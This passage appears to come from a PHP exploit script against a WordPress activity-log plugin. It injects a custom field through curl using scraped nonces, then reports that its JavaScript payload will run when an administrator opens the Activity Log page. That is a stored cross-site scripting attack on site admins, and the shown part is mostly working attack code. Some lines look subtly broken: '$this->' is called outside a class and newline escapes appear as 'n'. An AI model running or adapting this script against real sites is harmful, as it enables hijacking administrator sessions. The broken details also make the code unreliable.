        'meta_value' => 'test_value',
        '_wpnonce' => $this->extract_nonce($response, '_wpnonce'),
        'addmeta' => 'Add Custom Field'
    ])
]);

$response = curl_exec($ch);

// Verify the custom field was added
if (strpos($response, 'Custom field added.') !== false) {
    echo 'Payload injected successfully.n';
    echo 'When an administrator views the Activity Log page, the JavaScript will execute.n';
    echo 'Admin URL: ' . $target_url . '/wp-admin/admin.php?page=wsal-auditlogn';
} else {
    echo 'Payload injection may have failed.n';
}

curl_close($ch);

// Helper function to extract nonce from HTML response
function extract_nonce($html, $name) {
    preg_match('/name="' . preg_quote($name) . '" value="([^"]+)"/', $html, $matches);
    return $matches[1] ?? '';
}

// Helper function to extract post ID from response
function extract_post_id($html) {
    preg_match('/post=([0-9]+)/', $html, $matches);
    return $matches[1] ?? null;
}

?>